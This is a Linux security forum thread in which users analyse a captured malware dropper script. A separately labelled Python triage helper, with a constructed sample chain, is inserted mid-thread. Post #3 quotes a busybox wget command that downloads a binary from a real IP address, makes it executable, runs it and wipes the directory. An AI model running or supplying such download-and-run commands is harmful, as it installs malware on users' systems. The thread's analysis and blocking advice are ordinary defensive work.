LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 05-02-2016, 02:14 AM   #1
haz12
LQ Newbie
 
Registered: May 2016
Posts: 3

Rep: Reputation: Disabled
solved.


Thanks

Last edited by haz12; 05-16-2016 at 01:11 AM.
 
Old 05-02-2016, 03:01 AM   #2
Turbocapitalist
LQ Guru
 
Registered: Apr 2005
Distribution: Linux Mint, Devuan, OpenBSD
Posts: 7,288
Blog Entries: 3

Rep: Reputation: 3718
If you post it between the two [code] and [/code] tags, it will be readable here.
 
Old 05-02-2016, 08:40 AM   #3
Turbocapitalist
LQ Guru
 
Registered: Apr 2005
Distribution: Linux Mint, Devuan, OpenBSD
Posts: 7,288
Blog Entries: 3

Rep: Reputation: 3718
Looking at one 'line' it can be made more readable by putting each program on a separate line of its own.

Code:
busybox wget wget http://80.82.64.190/sparc; 
busybox chmod +x sparc; 
./sparc; 
busybox rm -f sparc*
rm -f *
busybox is a small system in a single binary. It's used, among other places, during the installation of the OS. It includes a few tools compiled in. wget, chmod, and rm are three of them. It's interesting enough that I would recommend reading a little about it on the net.

The first line has an error. wget is there twice. But the result will be the same, wget will fetch over HTTP the file "sparc" from the address specified. My guess, without looking at it, is that it is a binary with some kind of rootkit specific to the sparc architecture. The file is then made executable and then an attempt is made to run it. No telling from the script what it does if it is successful. But after it fails or is finished, busybox removes it. Then a general erasure of all files in the current directory takes place.

Then it tries the next file and so on.

The address used to download is in the Seychelles and registered to Quasi Networks LTD if the whois database is correct. There is an abuse contact given; it might be worth it to e-mail them.
 
Old 05-02-2016, 10:07 AM   #4
pingu_penguin
Member
 
Registered: Aug 2004
Location: pune
Distribution: Slackware
Posts: 349

Rep: Reputation: 60
basically the script is downloading files for all different types of architectures.
Could be a script too but I can't say.

It first clears the tmp folder, removes ps and strings, and

for each architecture it does the following:

1. it downloads them
2. makes it executable (chmod +x)
3. runs the file
4. removes traces by deleting the original file.

The second half does the same by copying the busybox binary into the current folder (probably thinking he doesn't have the busybox binary in his path - a guess here)

The third half does the same except it executes the downloaded files from the /tmp/<arch> binary and removes traces again - since the /tmp directory is world writable.
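As an added example (not code from the thread or from any of its posters), the Python triage helper below does mechanically what the two posts above do by hand: it splits a captured command line into its individual commands, treats `busybox wget` as `wget`, and reports the fetch, chmod, execute and clean-up steps, the download URLs and the contacted hosts, plus a flag for the `rm -f *` wipe of the working directory. The sample chain is constructed, modelled on the quoted script (doubled `wget` included); `192.0.2.10` is a TEST-NET documentation address, not the host from the thread. The set of downloader names, the executed-path prefixes and the "piped to sh" rule are this example's own assumptions.

```python
"""Triage a captured download-and-run shell chain (added example, not the thread's code).

Given one command line as a honeypot or shell audit log would record it,
split it into individual commands, recognise the fetch -> chmod -> run ->
clean-up sequence discussed above, and pull out the download URLs and
contacted hosts as indicators for blocking or an abuse report.
"""
import re
import shlex
from dataclasses import dataclass, field
from typing import List
from urllib.parse import urlparse

# Constructed sample modelled on the chain quoted in the thread (including the
# doubled "wget"). 192.0.2.10 is a TEST-NET documentation address, not a real host.
SAMPLE_CHAIN = (
    "cd /tmp; rm -rf *; "
    "busybox wget wget http://192.0.2.10/sparc; busybox chmod +x sparc; ./sparc; "
    "busybox rm -f sparc*; "
    "busybox wget http://192.0.2.10/x86; busybox chmod +x x86; ./x86; rm -f *"
)

URL_RE = re.compile(r"https?://[^\s;|&]+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}  # assumption: common fetchers


@dataclass
class Triage:
    download_urls: List[str] = field(default_factory=list)
    made_executable: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    cleanup_cmds: List[str] = field(default_factory=list)
    wipes_cwd: bool = False  # a bare "rm ... *" deletes everything in the directory

    @property
    def hosts(self) -> List[str]:
        """Distinct hosts contacted, in first-seen order."""
        seen: List[str] = []
        for url in self.download_urls:
            host = urlparse(url).hostname
            if host and host not in seen:
                seen.append(host)
        return seen

    @property
    def is_dropper(self) -> bool:
        """Fetches something and then runs it: the download-and-run signature."""
        return bool(self.download_urls) and bool(self.executed)


def split_commands(line: str) -> List[str]:
    """Split on ';', '&&', '||' and '|' (quotes are not honoured; this is triage)."""
    parts = re.split(r"\s*(?:;|&&|\|\||\|)\s*", line.strip())
    return [p for p in parts if p]


def strip_busybox(argv: List[str]) -> List[str]:
    """'busybox wget ...' invokes the wget applet; treat it as plain 'wget ...'."""
    if len(argv) > 1 and argv[0] == "busybox":
        return argv[1:]
    return argv


def triage_chain(line: str) -> Triage:
    t = Triage()
    for cmd in split_commands(line):
        try:
            argv = strip_busybox(shlex.split(cmd))
        except ValueError:  # unbalanced quotes: skip this fragment
            continue
        if not argv:
            continue
        prog = argv[0]
        if prog in DOWNLOADERS:
            t.download_urls.extend(URL_RE.findall(cmd))
        elif prog == "chmod" and len(argv) >= 3:
            t.made_executable.extend(argv[2:])  # "chmod +x file ..." -> the files
        elif prog.startswith(("./", "/tmp/", "/dev/shm/")):
            t.executed.append(prog)  # runs a file from the working dir or a scratch dir
        elif prog in ("sh", "bash") and t.download_urls:
            t.executed.append(cmd)  # "curl ... | sh": executed without touching disk
        elif prog == "rm":
            t.cleanup_cmds.append(cmd)
            if "*" in argv[1:]:
                t.wipes_cwd = True
    return t


def summarize(line: str) -> str:
    """One-line verdict suitable for a honeypot report or alert."""
    t = triage_chain(line)
    verdict = "DROPPER" if t.is_dropper else "no download-and-run pattern"
    wipe = " including a wipe of the working directory" if t.wipes_cwd else ""
    return (f"{verdict}: {len(t.download_urls)} download(s) from "
            f"{', '.join(t.hosts) or 'n/a'}; executed {t.executed or 'nothing'}; "
            f"{len(t.cleanup_cmds)} rm command(s){wipe}")


if __name__ == "__main__":
    print(summarize(SAMPLE_CHAIN))
```

The `hosts` list is what you would feed to a firewall rule or an abuse e-mail; the `wipes_cwd` flag is worth surfacing separately because, as noted above, a trailing `rm -f *` destroys any other files in the directory the chain was run from, not just the downloaded binaries.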
 
Old 05-02-2016, 10:18 AM   #5
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
I judge the code/script to be attempting to secure their hold on the system.
 
Old 05-02-2016, 10:27 AM   #6
pingu_penguin
Member
 
Registered: Aug 2004
Location: pune
Distribution: Slackware
Posts: 349

Rep: Reputation: 60
lol that site is still alive, it's downloading a bin file for all architectures.

I just tried http://80.82.64.190 in firefox ^.^ to see an Apache test page.
 
Old 05-02-2016, 10:35 AM   #7
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
because where there is one...
Code:
sudo iptables -I INPUT -s 80.82.64.0/24 -j REJECT --reject-with icmp-host-unreachable
I'm too paranoid for honeypots.

Last edited by Habitual; 05-02-2016 at 10:36 AM.
 
Old 05-02-2016, 11:19 AM   #8
rtmistler
Moderator
 
Registered: Mar 2011
Location: USA
Distribution: MINT Debian, Angstrom, SUSE, Ubuntu, Debian
Posts: 9,879
Blog Entries: 13

Rep: Reputation: 4930
I agree with Habitual. All those chmod and rm -rf statements, sandwiched around running the downloaded file.

I would avoid that script. And the term "honeypot" whatever it really means, slang or no, sounds dirty from the get-go.
 
Old 05-02-2016, 11:34 AM   #9
Ihatewindows522
Member
 
Registered: Oct 2014
Location: Fort Wayne
Distribution: Ubuntu 16.04 LTS
Posts: 616
Blog Entries: 2

Rep: Reputation: 166
Well, here's where your script is coming from:
https://www.google.com/maps/place/Vi...e3e07e7e6c3cde

Found that by a whois report. Also here's the nmap report.
https://drive.google.com/open?id=0B6...zZEUXoxX0xWVWc

Downloaded one of the binaries, the one called "x86"...
https://www.virustotal.com/en/file/6...is/1462206823/
Looks like a DDOS bot.

Last edited by Ihatewindows522; 05-02-2016 at 11:46 AM. Reason: Can't attach a zip...
 
  

